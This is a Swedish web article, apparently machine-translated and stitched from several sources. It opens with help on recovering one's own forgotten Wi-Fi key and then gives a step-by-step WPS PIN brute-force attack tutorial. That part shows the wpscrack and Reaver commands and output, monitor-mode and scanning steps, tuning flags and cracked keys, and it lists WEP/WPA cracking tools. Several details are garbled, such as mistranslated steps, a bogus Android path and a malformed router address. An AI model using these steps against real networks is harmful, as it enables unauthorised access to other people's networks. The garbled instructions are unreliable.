Säkerhetsnyckeln ansluter inte till wifi. Vad du ska göra om du har glömt ditt WiFi-lösenord: Video


Om du har glömt ditt lösenord trådlöst nätverk, som de är kopplade till det här ögonblicket, då kan du enkelt hitta det via din dator utan att ladda ner det programvara från tredje part. Den här situationen uppstår ofta när gäster kommer till dig och ber om att få använda Wi-Fi-nätverket, men du anslutit det så länge sedan att du glömt alla lösenord. Om du har ett Windows-operativsystem installerat får du två ytterligare sätt ta reda på nätverkssäkerhetsnyckeln via din dator. I andra situationer är det bättre att se det i en webbläsare via routerinställningarna. Titta på alla alternativ i den här artikeln och välj det mest bekväma för dig själv.

Hur man tar reda på nätverkssäkerhetsnyckeln i Windows

Det här operativsystemet är ganska flexibelt, så du kan enkelt se de lösenord och nycklar som du själv angett. Du behöver bara ha tillgång till en dator som är ansluten till ett Wi-Fi-nätverk.

Hur man tar reda på nätverkssäkerhetsnyckeln genom datorbrickan

  • Mest snabbt sätt ta reda på WiFi-lösenordet. Leta bara efter nätverksikonen i facket på din dator. Den finns bredvid datum och tid och kan se ut som en antenn eller nätverksskylt på en telefon.
  • Välj det nätverk från vilket du vill ta reda på lösenordet. Din dator måste vara ansluten till den.
    Klick Högerklicka mus med dess namn.
  • Välj "Egenskaper" från listan som visas.


  • Ett fönster öppnas med ditt lösenord. Som standard skyddas lösenordstecken av displayinställningar. Markera rutan bredvid orden "Visa angivna tecken" för att se lösenordet.


Hur man tar reda på nätverkssäkerhetsnyckeln via Network Sharing Center

Om du inte kan ta reda på lösenordet med den tidigare metoden av någon anledning. Då kan du komma till egenskapsfönstret för detta nätverk på ett annat sätt.

  • Öppna din datorbricka och klicka på nätverksikonen igen. Klicka på länken "Nätverks- och delningscenter" delad åtkomst”.


  • Här ser du det anslutna trådlösa nätverket, du måste klicka på länken i mitten av fönstret.


  • I fönstret som visas väljer du fältet "Egenskaper för trådlöst nätverk".


  • Gå nu till fliken "Säkerhet".


  • Du befinner dig i det redan bekanta fönstret med lösenordet för Wi-Fi-anslutningen. Markera rutan för att visa symbolerna och ta reda på din trådlösa nätverksnyckel.


Hur man tar reda på nätverkssäkerhetsnyckeln genom routerinställningarna

Detta alternativ är lämpligt för alla operativsystem, eftersom du arbetar direkt med routern.

  • Du kan komma åt inställningarna för din router eller router via en webbläsare. Ange bara följande port i adressfältet: 192.168.0.1 eller 192.168.0.1.1
  • Standardlösenordet och inloggningen för alla routrar är "admin" utan citattecken. Om du ändrade den här parametern anger du ditt användarnamn och lösenord.


  • Väl i menyn väljer du "Trådlöst läge".


  • Gå nu till fliken "Trådlös säkerhet".
  • Här kan du hitta lösenordet för Wi-Fi-nätverket under "Lösenord för trådlöst nätverk". Skriv ner det och förvara det på ett säkert ställe så att du aldrig glömmer det.


Innan du tar reda på säkerhetsnyckeln för ett internetbaserat Wi-Fi-nätverk från Rostelecom måste du ta reda på vilken utrustning som används för distribution trådlös anslutning. Varje routertillverkare erbjuder sitt eget sätt att konfigurera programvaran. Oftast utförs redigering av parametrar via nätverksenhetens webbgränssnitt.

Hur man tar reda på Wi-Fi-säkerhetsnyckeln för Rostelecom-nätverket

I de fall då frågan uppstår om hur man får reda på säkerhetsnyckeln till ett trådlöst hem eller kontorsnätverk, måste du gå till inställningarna för routern eller modemet, oavsett om du använder Internet från Rostelecom eller en annan operatör. inställningar nätverksutrustning i de flesta fall görs detta med .

Få tillgång till programvara du måste ange IP-adressen för modemet eller routern i valfri webbläsare som är installerad på din dator.

Beroende på hårdvarutillverkaren används olika standardadressvärden. De vanligaste märkena med motsvarande IP kan ses i tabellen.

Tillverkare av nätverksutrustning

Information om företaget

IP-adress för åtkomst till webbgränssnittet och standardvärden för inloggning/lösenord.

Taiwanesiskt företag som samarbetar med ledande ryska organisationer. Router och modem från D-Link är olika lågt pris, men samtidigt pålitlig och lätt att använda.

Ett kinesiskt företag som är ledande inom nätverksutrustning över hela världen. Routers och TP-Link modem finns i de flesta länder i världen. Priserna för utrustning från denna tillverkare har ett brett utbud, så att du kan hitta lämplig modell för alla hem och företag.

Tenda-utrustning tillverkas i Kina. Företagets routrar och modem är efterfrågade både i Mellanriket och i Ryssland (cirka 40 % av marknaden för nätverksenheter). Prispolicy tillverkaren är mycket vänlig mot slutkonsumenter och internetleverantörer, vilket är anledningen till dess stora popularitet.

Företaget är rysk tillverkare nätverksutrustning. Det används ofta av leverantörer under sin egen logotyp. Utrustningen är optimalt lämpad för heminternet från Rostelecom, så att du inte bara kan använda den kabelanslutning, men även Wi-Fi-nätverk med säkerhetsnyckel.

Upvel nätverksutrustning tillverkas i Kina. Företaget erbjuder sina kunder ett brett utbud av enheter. Modeller designade för att skapa hemnätverk, har intuitivt tydligt gränssnitt, lätt att installera och använda.

Företaget är en ledande tillverkare av utrustning på den globala marknaden. Tillverkarens routrar och modem skiljer sig åt hög kvalitet och vacker design. Nätverksenheter från Asus - bra val för krävande användare. Sådan utrustning gör att du kan njuta hög hastighet fungera utan misslyckanden. Kostnaden för routrar och modem är vanligtvis inte riktade till budgetköpare.

Listan över tillverkare som anges i tabellen är inte komplett, men den representerar alla de stora varumärkena som oftast används hos teleoperatören Rostelecom. IP-adressdata kan skilja sig åt för vissa modeller, men i de flesta fall kommer de att ha de angivna värdena.

Var och hur man anger nätverksnyckeln till Rostelecom-routern

Du kan bekanta dig med att ställa in Internetparametrar på Upvel-routrar på.

För att ansluta en dator som kör ett operativsystem behöver du:

  • klicka på Internet-ikonen i det nedre högra hörnet (fack);
  • välj en åtkomstpunkt;
  • ange och bekräfta lösenordet.

Innan du anger Rostelecom-nätverksnyckeln i utrustningsinställningarna eller helt enkelt tar reda på det, måste du bestämma IP-adressen för routern. Detta gör att du kan komma åt enhetsinställningarna och ange säkerhetskombinationen för åtkomstpunkten.

När du är ansluten till ett trådlöst nätverk Wi-Fi-användare Ställs ofta inför behovet av att ange en viss nätverkssäkerhetsnyckel. I den här artikeln kommer vi att berätta vad en trådlös säkerhetsnyckel är. Wi-Fi-nätverk, samt hur du tar reda på den här nyckeln med hjälp av inställningarna för routern, datorn eller bärbara datorn som den är sparad på.

För att förstå vad en säkerhetsnyckel är behöver du säga några ord om olika typer Wi-Fi-nätverk. Ett Wi-Fi-nätverk kan vara öppet eller säkert. Ett öppet nätverk är inte skyddat på något sätt och du behöver inte ange några data för att ansluta till ett sådant nätverk. TILL öppet nätverk Vem som helst kan ansluta, huvudsaken är att vara inom nätverksräckvidden. Detta är mycket praktiskt för att tillhandahålla internetåtkomst på offentliga platser. Ett säkert nätverk är tvärtom stängt för tillfälliga användare. Säkra nätverk används vanligtvis för att bygga trådlösa nätverk för kontor, arbete och hem. För att kunna ansluta till ett sådant nätverk måste du känna till en hemlig uppsättning tecken, som kallas en Wi-Fi-säkerhetsnyckel eller lösenord.

I allmänhet är en Wi-Fi-säkerhetsnyckel ett lösenord som du behöver känna till för att ansluta till nätverket. När du ansluter till ett säkert nätverk kommer enheten du använder definitivt att be dig ange en säkerhetsnyckel eller lösenord. Efter att ha angett denna information kontrolleras det angivna lösenordet för korrekthet och om lösenordet är korrekt uppstår anslutningen. Om lösenordet är felaktigt avbryts anslutningen.

Det bör noteras att det finns en viss förvirring i termer här. På vissa enheter (till exempel på mobila gadgets med operativsystemet Android eller iOS) given nyckel säkerhet kallas ett lösenord. Det vill säga att användaren uppmanas att ange ett lösenord, och han förstår omedelbart vad som krävs av honom för att ansluta till nätverket.

Samtidigt använder bärbara datorer och datorer som kör Windows operativsystem mer rätt namn, nämligen "säkerhetsnyckeln". Användningen av termen "säkerhetsnyckel" är ofta förvirrande oerfarna användare, eftersom de inte förstår vad som krävs av dem.

Hur du tar reda på din trådlösa nätverkssäkerhetsnyckel

Wi-Fi-säkerhetsnyckeln är installerad på enheten som skapar detta trådlösa nätverk. Detta kan vara en trådlös router eller hotspot Wi-Fi. Därför mest pålitligt sätt för att ta reda på Wi-Fi-säkerhetsnyckeln är att gå till inställningarna för routern eller åtkomstpunkten och titta.

För att göra detta måste du först ansluta till nätverket för denna router. Detta kan göras via kabel eller via Wi-Fi (när ansluten via Wi-Fi-ingång inställningar kan vara blockerade). Därefter måste du öppna valfri webbläsare och ange routerns IP-adress i adressfältet (vanligtvis 192.168.0.1 eller 192.168.1.1).

Efter detta kommer du att bli ombedd att ange ditt användarnamn (inloggning) och lösenord. Standardinloggning och lösenord anges ofta på undersidan av routern, och denna information finns även i instruktionerna för routern.

När du har angett ditt användarnamn och lösenord kommer du till routerns webbgränssnitt. Här behöver du hitta ett avsnitt med Wi-Fi-inställningar. Det här avsnittet kallas vanligtvis Wi-Fi, Trådlöst nätverk, WLAN eller trådlöst nätverk. I avsnittet Wi-Fi-inställningar kan du hitta säkerhetsnyckeln som krävs för att ansluta.

Om du har en dator där säkerhetsnyckeln är sparad kan du göra det utan att gå in i routerns inställningar. För att göra detta måste du öppna Nätverks- och delningscenter. I Windows 7, för att göra detta, måste du högerklicka på nätverksanslutningsikonen eller gå till "Kontrollpanelen" och öppna avsnittet "Nätverk och Internet - Nätverks- och delningscenter"

I Windows 10 är det enklaste sättet att göra detta att använda Kör-menyn. Tryck kombination Windows-R-nycklar och kör kommandot "control.exe /name Microsoft.NetworkandSharingCenter".

I fönstret Nätverks- och delningscenter klickar du på länken Hantera trådlösa nätverk.

Här måste du hitta det nödvändiga Wi-Fi-nätverket nätverk, högerklicka på det och gå till "Egenskaper".

Som ett resultat kommer ett fönster att visas med egenskaperna för det valda Wi-Fi-nätverket. För att se den sparade säkerhetsnyckeln, gå till fliken "Säkerhet" och aktivera alternativet "Visa angivna tecken". Efter detta kommer den information du behöver att visas i textfältet "Network Security Key".

Om du inte har tillgång till routern och inte har ett sparat lösenord på din dator måste du kontakta din systemadministratör eller internetleverantören som servar ditt Wi-Fi-nätverk för hjälp.

Tydligen är det ingen idé att säga att de flesta användare har stött på en situation där systemet, när de försöker ansluta till ett trådlöst nätverk, uppmanar dem att ange den så kallade nätverkssäkerhetsnyckeln.

Vad det är, vad det används till och hur man känner igen det kommer att diskuteras vidare. Låt oss överväga flera alternativ för grundläggande åtgärder som kommer att hjälpa även de som har glömt den inställda kombinationen för att ansluta via Wi-Fi.

Wi-Fi-nätverkssäkerhetsnyckel: vad är det och vad används det till?

Låt oss börja med själva definitionen. Nätverkssäkerhet är känd för absolut alla användare av datorer och mobila enheter. Om man tittar på det abstruerade namnet kan inte alla lista ut vad vi pratar om.

Faktum är att detta är ett lösenord som ställts in i de trådlösa anslutningsinställningarna för att förhindra att någon annan använder det och får tillgång till konfidentiell data, till exempel när du organiserar trådlösa hemnätverk med delad åtkomst till filer och mappar.

Var får man en nätverkssäkerhetsnyckel: alternativ

Många användare litar på inställningsparametrar trådlös anslutning Leverantörsspecialister eller externa bekanta glömmer ofta att skriva ner det skapade lösenordet. Och först då, till exempel vid återställning av systemet efter kritiska fel eller när fullständig ominstallation, bita i armbågarna, komma ihåg den nödvändiga kombinationen för att komma åt anslutningen och smärtsamt undra hur man tar reda på nyckeln För att göra detta, kan du försöka följande åtgärder:

  • nätverksverktyg Windows-system för stationära datorer och bärbara datorer;
  • ställa in routerparametrar;
  • tredje parts program;
  • brute force (med brute force) för att beräkna lösenordet för någon annans anslutning.

Om de tre första alternativen är standard och används i alla Windows-system, och nyckeln bestäms genom en mobil enhet, kan användningen av brute force, ur legalitetssynpunkt eller moraliska och etiska överväganden, betraktas som olagligt spela teater. Vi kommer att överväga alla alternativ, inklusive grovt ingripande, men endast i allmänna informationssyfte.

Använder anslutningsinställningar

Så, hur tar du reda på nätverkssäkerhetsnyckeln som är inställd för anslutningen konfigurerad på användarens dator eller bärbara dator?

I själva enkelt fall vid arbete med operationssalar Windows-system 7 och nedan, efter att ha anropat egenskaperna för den aktuella anslutningen, öppnas den nödvändiga sektionen omedelbart med en säkerhetsflik, där under lösenordsinmatningsfältet, som som standard visas som asterisker eller prickar, måste du markera rutan för att visa angivna tecken . När du har slutfört dessa steg kan nätverkssäkerhetsnyckeln skrivas ned, kopieras eller sparas till t.ex. textfil.

På samma sätt kan du komma åt de nödvändiga inställningarna i "Nätverks- och delningscenter", som finns i standard "Kontrollpanelen" (i Windows 10 är det enklast att ringa kontrollkommando i "Kör"-konsolen). Här väljer du helt enkelt din anslutning, går till egenskaperna för det trådlösa nätverket och använder samma säkerhetsflik.

Information om säkerhetsnyckeln i routerinställningarna

Du kan ta reda på Wi-Fi-nätverkets säkerhetsnyckel lika enkelt i routerinställningarna. För att göra detta, först, genom en tillgänglig webbläsare, bör du logga in på routerns webbgränssnitt genom att gå in adressfält kombinationer som 192.168.0.1 eller 1.1 i slutet, ange användarnamn och lösenord (vanligtvis admin för båda fälten) och gå sedan till menyn Trådlös säkerhet.

Här kommer ett speciellt fält att visas, betecknat som PSK-lösenord eller något liknande, där den nödvändiga åtkomstkombinationen kommer att markeras.

Hur får man reda på åtkomstlösenordet på mobila enheter?

När det gäller mobila enheter kan de också använda aktiveringen av lösenordsvisningsfältet. Det är dock inte alltid möjligt att fastställa nätverkssäkerhetsnyckeln på detta sätt. I operativsystem Android lösenord dold ganska djupt, kan det vara ganska problematiskt att hitta den utan root-rättigheter. Men om du installerar dem, till exempel genom att installera en drivrutin Kingo Root och försäkra dig om superanvändarrättigheter, det kommer inte att vara några problem.

I det här fallet måste du dessutom installera några filhanterare tycka om Root Explorer, gå till sökvägen data\musik\wifi till intern lagring, hitta där konfigurationsfil wpa_supplicant.conf, öppna den med vilket program du vill arbeta med textdokument(webbläsare eller inbyggt hanterarverktyg) och hitta namnet önskat nätverk(SSID). Bredvid namnet kommer den nödvändiga nätverkssäkerhetsnyckeln som används för åtkomst att indikeras.

Du kan också använda speciella applets som WiFi-lösenord, efter att ha ringt som absolut alla anslutningar som någonsin har gjorts med av denna enhet. Sedan återstår bara att aktivera fältet för att visa nätverkssäkerhetsnyckeln och visa nödvändiga data.

Obs: på Mobil enheter, liknande Windows-system, genom en webbläsare kan du ange inställningarna för routern du använder och se lösenordet i dess parametrar. Men det här är ganska obekvämt.

Beräknar lösenordet för någon annans anslutning

När det gäller brute force används de i de flesta fall specialiserade program att knäcka lösenord.

För Windows är det mest populära verktyget Aircrack-ng, och för Mobil enheter kör Android-system - WBR-programmet. Av uppenbara skäl, frågor kring deras användning och detaljerade instruktioner beaktas inte.

För inte så länge sedan verkade det som att ett trådlöst nätverk skyddat med WPA2-teknik var ganska säkert. Att hitta en enkel nyckel för att ansluta är verkligen möjligt. Men om du verkligen installerar lång nyckel, då hjälper varken regnbågstabeller eller ens GPU-acceleration till att få ner det. Men, som det visade sig, kan du ansluta till ett trådlöst nätverk utan detta – genom att dra nytta av en nyligen upptäckt sårbarhet i WPS-protokollet.

VARNING

All information presenteras endast i utbildningssyfte. Att tränga in i någon annans trådlösa nätverk kan lätt betraktas som ett brott. Tänk med huvudet.

Priset för förenklingar

Det blir färre och färre öppna accesspunkter som du inte behöver ange en nyckel till för att ansluta alls. Det verkar som att de snart kan listas i Röda boken. Om en person tidigare kanske inte ens visste att ett trådlöst nätverk kan låsas med en nyckel, skyddar sig själv från externa anslutningar, nu får han allt mer information om denna möjlighet. Ta till exempel den anpassade firmware som ledande leverantörer producerar för populära modeller routrar för att förenkla installationen. Du behöver ange två saker - inloggning/lösenord och... en nyckel för att skydda det trådlösa nätverket. Ännu viktigare är att hårdvarutillverkarna själva försöker göra installationsprocessen enkel. Således stöder de flesta moderna routrar mekanismen WPS (Wi-Fi Protected Setup). Med dess hjälp kan användaren sätta upp ett säkert trådlöst nätverk på några sekunder, utan att störa sig alls med det faktum att "du måste aktivera kryptering någon annanstans och registrera en WPA-nyckel." Jag skrev in den åttasiffriga symboliska PIN-koden i systemet, som är skriven på routern, och du är klar! Och här, håll i dig. I december talade två forskare om allvarliga grundläggande brister i WPS-protokollet. Det är som en bakdörr för vilken router som helst. Det visade sig att om WPS är aktiverat vid åtkomstpunkten (som för ett ögonblick är aktiverad i de flesta routrar som standard), så kan du välja en PIN-kod för anslutning och extrahera nyckeln för anslutning inom några timmar!

Hur fungerar WPS?

Idén med skaparna av WPS är bra. Mekanismen ställer automatiskt in nätverksnamn och kryptering. Användaren behöver alltså inte gå in i webbgränssnittet och hantera komplexa inställningar. Och du kan enkelt lägga till vilken enhet som helst (till exempel en bärbar dator) till ett redan konfigurerat nätverk: om du anger PIN-koden korrekt kommer den att ta emot allt nödvändiga inställningar. Detta är mycket bekvämt, vilket är anledningen till att alla större aktörer på marknaden (Cisco/Linksys, Netgear, D-Link, Belkin, Buffalo, ZyXEL) nu erbjuder trådlösa routrar med WPS-stöd. Låt oss titta på det lite mer detaljerat.

Det finns tre alternativ för att använda WPS:

  1. Tryck-knapp-anslut (PBC). Användaren klickar specialknapp på routern (hårdvara) och på datorn (mjukvara), vilket aktiverar installationsprocessen. Vi är inte intresserade av detta.
  2. Ange en PIN-kod i webbgränssnittet. Användaren kommer åt routerns administrativa gränssnitt genom en webbläsare och anger den åttasiffriga PIN-koden som är skriven på enhetens kropp (Figur 1), varefter installationsprocessen sker. Denna metod är mer lämplig för den initiala konfigurationen av routern, så vi kommer inte att överväga det heller.
  3. Ange PIN-koden på användarens dator (Figur 2). När du ansluter till en router kan du öppna en speciell WPS-session, inom vilken du kan konfigurera routern eller få befintliga inställningar om du anger PIN-koden korrekt. Detta är redan attraktivt. Ingen autentisering krävs för att öppna en sådan session. Vem som helst kan göra detta! Det visar sig att PIN-koden redan är potentiellt mottaglig för en bruteforce-attack. Men det här är bara blommor.

Sårbarhet

Som jag noterade tidigare består PIN-koden av åtta siffror - därför finns det 10^8 (100 000 000) alternativ att matcha. Antalet alternativ kan dock minskas avsevärt. Faktum är att den sista siffran i PIN-koden representerar en viss kontrollsumma, som beräknas utifrån de första sju siffrorna. Som ett resultat får vi redan 10^7 (10 000 000) alternativ. Men det är inte allt! Därefter tittar vi noggrant på enheten för WPS-autentiseringsprotokollet (Figur 3). Det känns som att det var speciellt designat för att lämna utrymme för brute force. Det visar sig att PIN-kodverifiering utförs i två steg. Den är uppdelad i två lika delar, och varje del kontrolleras separat! Låt oss titta på diagrammet:

  1. Om angriparen, efter att ha skickat M4-meddelandet, fick ett EAP-NACK som svar, kan han vara säker på att den första delen av PIN-koden är felaktig.
  2. Om han fick ett EAP-NACK efter att ha skickat M6, så är den andra delen av PIN-koden felaktig. Vi får 10^4 (10 000) alternativ för den första halvan och 10^3 (1 000) för den andra. Som ett resultat har vi bara 11 000 alternativ för en fullständig sökning. För att bättre förstå hur detta kommer att fungera, titta på diagrammet.
  3. En viktig punkt är den möjliga sökhastigheten. Den begränsas av den hastighet med vilken routern bearbetar WPS-förfrågningar: vissa åtkomstpunkter ger resultat varje sekund, andra var tionde sekund. Den mesta tiden ägnas åt att beräkna den publika nyckeln med hjälp av Diffie-Hellman-algoritmen, den måste genereras före steg M3. Tiden som läggs på detta kan minskas genom att välja en enkel hemlig nyckel på klientsidan, vilket kommer att förenkla beräkningarna av andra nycklar i framtiden. Övning visar att för ett lyckat resultat räcker det vanligtvis att gå igenom bara hälften av alla alternativ, och i genomsnitt tar brute force bara fyra till tio timmar.

Första implementeringen

Den första implementeringen av brute force som dök upp var verktyget wpscrack (goo.gl/9wABj), skrivet av forskaren Stefan Vibök på Python språk. Verktyget använde Scapy-biblioteket, som låter dig injicera godtyckligt nätverkspaket. Skriptet kan endast köras under ett Linux-system, efter att det trådlösa gränssnittet först har växlats till övervakningsläge. Du måste ange ett namn som parametrar nätverksgränssnitt i systemet, MAC-adressen för den trådlösa adaptern, samt MAC-adressen för åtkomstpunkten och dess namn (SSID).

$ ./wpscrack.py --iface mon0 --client 94:0c:6d:88:00:00 --bssid f4:ec:38:cf:00:00 --ssid testap -v sniffer började försöka 00000000 försök tog 0,95 sekunder försöker 00010009<...>försök 18660005 försök tog 1,08 sekunder försök 18670004# hittade första halvan av PIN-försök tog 1,09 sekunder försök 18670011 försök tog 1,08 sekunder<...>försöker 18674095# hittade 2:a halvan av PIN-koden<...>Nätverksnyckel: 0000 72 65 61 6C 6C 79 5F 72 65 61 6C 6C 79 5F 6C 6F really_real_lo 0010 6E 67 5F 77 70 61 5F 70 61 7 0 7 2 0 5 5F 67 6F 6F 64 6F 6C 75 63 6B 5F 63 72 61 63 e_good_luck_crac 0030 6B 69 6E 67 5F 74 68 69 73 5F 6F 6E 65king_this_one<...>

Som du kan se valdes först den första hälften av PIN-koden, sedan den andra, och till slut producerade programmet en färdig att använda nyckel för att ansluta till det trådlösa nätverket. Det är svårt att föreställa sig hur lång tid det skulle ha tagit att hitta en nyckel av denna längd (61 tecken) med redan existerande verktyg. Wpscrack är dock inte det enda verktyget för att utnyttja sårbarheten, och detta är ett ganska roligt ögonblick: samtidigt arbetade en annan forskare, Craig Heffner från Tactical Network Solutions, med samma problem. När han såg att en fungerande PoC för att implementera en attack dök upp på Internet, publicerade han sitt Reaver-verktyg. Det automatiserar inte bara processen att välja WPS-PIN och extrahera PSK-nyckeln, utan erbjuder också ett större antal inställningar så att attacken kan utföras mot en mängd olika routrar. Dessutom stöder den ett mycket större antal trådlösa adaptrar. Vi bestämde oss för att ta det som grund och beskriva i detalj hur en angripare kan använda en sårbarhet i WPS-protokollet för att ansluta till ett säkert trådlöst nätverk.

HUR

Som med alla andra attacker på ett trådlöst nätverk behöver vi Linux. Här ska det sägas att Reaver finns i arkivet för den välkända distributionen BackTrack, som också redan innehåller de nödvändiga drivrutinerna för trådlösa enheter. Därför kommer vi att använda det exakt.

Steg 0. Förbered systemet

På den officiella hemsidan finns BackTrack 5 R1 tillgänglig för nedladdning som virtuell maskin under VMware och startbild ISO. Jag rekommenderar det sista alternativet. Du kan helt enkelt skriva bilden på en tom, eller så kan du använda programmet för att göra startbart USB-minne: på ett eller annat sätt, efter att ha startat från ett sådant medium, kommer vi omedelbart att ha ett system redo för arbete utan några onödiga problem.

Snabbkurs i Wi-Fi-hackning

  1. WEP (Wired Equivalent Privacy) Den allra första tekniken för att skydda ett trådlöst nätverk visade sig vara extremt svag. Du kan hacka den bokstavligen på några minuter, med hjälp av svagheterna i RC4-chifferet som används i det. De viktigaste verktygen här är airodump-ng sniffer för att samla in paket och aircrack-ng-verktyget, som används direkt för att knäcka nyckeln. Det finns också ett specialverktyg wesside-ng, som i allmänhet hackar alla närliggande WEP-punkter automatiskt.
  2. WPA/WPA2 (trådlös skyddad åtkomst)

Overkill är det enda sättet välj en nyckel för ett slutet WPA/WPA2-nätverk (och även då endast om det finns en dumpning av den så kallade WPA Handshake, som sänds när klienten ansluter till accesspunkten).

Brut force kan dra i dagar, månader och år. För att öka effektiviteten i sökningen användes först specialiserade ordböcker, sedan genererades regnbågstabeller, och senare dök upp verktyg som använde NVIDIA CUDA och ATI Stream-tekniker för hårdvaruacceleration process med hjälp av GPU. Verktygen som används är aircrack-ng (brute force med hjälp av en ordbok), cowpatty (med regnbågstabeller), pyrit (med ett grafikkort).

Steg 1: Logga in

Standardinloggning och lösenord är root:toor. Väl i konsolen kan du säkert starta "X" (det finns separata BackTrack-sammansättningar - både med GNOME och KDE):

#startx

Steg 2: Installera Reaver

För att ladda ner Reaver behöver vi internet. Därför ansluter vi patchkabeln eller konfigurerar den trådlösa adaptern (menyn "Program > Internet > Wicd Network Manager"). Därefter startar vi terminalemulatorn, där vi laddar senaste versionen verktyg via förvaret:

# apt-get update # apt-get installation reaver

Här måste jag säga att förvaret innehåller version 1.3, som personligen inte fungerade korrekt för mig. Efter att ha sökt information om problemet hittade jag ett inlägg av författaren som rekommenderar att man uppdaterar maximalt möjlig version, sammanställning av källor hämtade från SVN. Detta är i allmänhet det mesta universell metod installationer (för all distribution).

$ svn kassan http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps $ cd ./reaver-wps/src/ $ ./configure $ make # make install

Det blir inga problem med montering under BackTrack - jag kollade det personligen. I distributionen Arch Linux, som jag använder, är installationen ännu enklare, tack vare närvaron av motsvarande PKGBUILD:

$ yaourt -S reaver-wps-svn

Steg 3. Förbereder sig för brute force

För att använda Reaver måste du göra följande:

  • växla den trådlösa adaptern till övervakningsläge;
  • ta reda på namnet på det trådlösa gränssnittet;
  • ta reda på MAC-adressen för åtkomstpunkten (BSSID);
  • se till att WPS är aktiverat på punkten.

Låt oss först kontrollera att det trådlösa gränssnittet överhuvudtaget finns i systemet:

#iwconfig

Om utgången av det här kommandot innehåller ett gränssnitt med en beskrivning (vanligtvis wlan0), betyder det att systemet kände igen adaptern (om det var anslutet till det trådlösa nätverket för att ladda Reaver, är det bättre att koppla från anslutningen). Låt oss sätta adaptern i övervakningsläge:

# airmon-ng starta wlan0

Detta kommando skapar ett virtuellt gränssnitt i övervakningsläge, dess namn kommer att anges i kommandoutgången (vanligtvis mon0). Nu måste vi hitta åtkomstpunkten för att attackera och ta reda på dess BSSID. Låt oss använda verktyget för att lyssna på trådlösa sändningar airodump-ng:

#airodump-ngmon0

En lista med åtkomstpunkter inom räckvidd visas på skärmen. Vi är intresserade av poäng med WPA/WPA2-kryptering och PSK-nyckelautentisering.

Det är bättre att välja en av de första i listan, eftersom det är önskvärt att utföra en attack bra anslutning med en prick. Om det finns många punkter och listan inte passar på skärmen, kan du använda ett annat välkänt verktyg - kismet, där gränssnittet är mer lämpligt i detta avseende. Alternativt kan du kontrollera på plats om WPS-mekanismen är aktiverad vid vår punkt. För att göra detta kommer Reaver med (men bara om du tar det från SVN) tvättverktyget:

# ./tvätt -i mån0

Parametern är namnet på gränssnittet som växlat till övervakningsläge. Du kan också använda alternativet '-f' och mata verktyget med en cap-fil skapad, till exempel, av samma airodump-ng. Förbi av någon okänd anledning Reaver-paketet i BackTrack inkluderade inte tvättverktyget. Låt oss hoppas att det här felet kommer att rättas till när den här artikeln publiceras.

Steg 4. Kör brute force

Nu kan du fortsätta direkt till att söka efter din PIN-kod. För att starta Reaver i det enklaste fallet behöver du inte mycket. Du behöver bara ange namnet på gränssnittet (som vi tidigare bytte till övervakningsläge) och B Punkt SSID tillgång:

# reaver -i mon0 -b 00:21:29:74:67:50 -vv

"-vv"-omkopplaren möjliggör förbättrad programutgång så att vi kan se till att allt fungerar som förväntat.

Reaver v1.4 WiFi-skyddad Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [+] Väntar på beacon från 00:21:29:74:67:50 [+] Associerad med 00:21:29:74:67:50 (ESSID: linksys) [+] Försöker pin 63979978

Om programmet konsekvent skickar PIN-koder till åtkomstpunkten betyder det att allt har börjat bra, och det återstår bara att vänta dumt. Processen kan ta lång tid. Den kortaste tiden under vilken jag kunde brutalt tvinga en PIN-kod var ungefär fem timmar. Så snart det är valt kommer programmet gärna att informera dig om det:

[+] Försöker pin 64637129 [+] Nyckeln knäcktes på 13654 sekunder [+] WPS PIN: "64637129" [+] WPA PSK: "MyH0rseThink$YouStol3HisCarrot!" [+] AP SSID: "linksys"

Det mest värdefulla här är förstås WPA-PSK-nyckeln, som du direkt kan använda för att ansluta. Allt är så enkelt att det inte ens passar i ditt huvud.


Är det möjligt att försvara sig?

För närvarande finns det bara ett sätt att skydda dig från en attack - inaktivera WPS i routerinställningarna. Men som det visade sig är detta inte alltid möjligt. Eftersom sårbarheten inte finns på implementeringsnivå, utan på protokollnivå, bör du inte förvänta dig en snabb patch från tillverkare som skulle lösa alla problem. Det mesta de kan göra nu är att motstå brute force så mycket som möjligt. Om du till exempel blockerar WPS i en timme efter fem misslyckade försök att ange PIN-koden, kommer sökningen att ta cirka 90 dagar. Men en annan fråga är, hur snabbt kan en sådan patch rullas ut till miljontals enheter som fungerar över hela världen?

Uppgradering av Reaver

I HOWTO:n visade vi det enklaste och mest mångsidiga sättet att använda verktyget Reaver. Men implementeringen av WPS olika tillverkareär annorlunda, så i vissa fall är det nödvändigt ytterligare anpassning. Nedan ska jag ge ytterligare alternativ, vilket kan öka hastigheten och effektiviteten för nyckelsökning.

  1. Du kan ställa in kanalnumret och SSID för åtkomstpunkten: # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
  2. Alternativet '—dh-small' har en gynnsam effekt på brute force-hastigheten, eftersom det anger ett litet värde för den hemliga nyckeln, vilket underlättar beräkningar på åtkomstpunktssidan: # reaver -i mon0 -b 00:01:02: 03:04:05 -vv - -dh-liten
  3. Standardtiden för svarstid är fem sekunder. Om det behövs kan du ändra det: # reaver -i mon0 -b 00:01:02:03:04:05 -t 2
  4. Standardfördröjningen mellan försöken är en sekund. Den kan också konfigureras: # reaver -i mon0 -b 00:01:02:03:04:05 -d 0
  5. Vissa åtkomstpunkter kan blockera WPS på särskild tid, misstänkte att de försökte knulla dem. Reaver märker denna situation och pausar sökningen i 315 sekunder som standard, varaktigheten för denna paus kan ändras: # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
  6. Vissa implementeringar av WPS-protokollet kommer att avsluta anslutningen om PIN-koden är felaktig, även om de enligt specifikationen ska returnera ett speciellt meddelande. Reaver känner automatiskt igen denna situation, för detta finns ett "—nack"-alternativ: # reaver -i mon0 -b 00:01:02:03:04:05 --nack
  7. Alternativet '--eap-terminate' är avsett att fungera med de AP:er som kräver avslutning av WPS-sessionen med EAP FAIL-meddelandet: # reaver -i mon0 -b 00:01:02:03:04:05 --eap -avsluta
  8. Förekomsten av fel i WPS-sessionen kan innebära att AP begränsar antalet försök att ange en PIN-kod, eller helt enkelt är överbelastad med förfrågningar. Information om detta kommer att visas på skärmen. I det här fallet pausar Reaver sin aktivitet och paustiden kan ställas in med alternativet '--fail-wait': # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait =360

FAQ

Fråga: Vilken trådlös adapter behövs för att hacka?

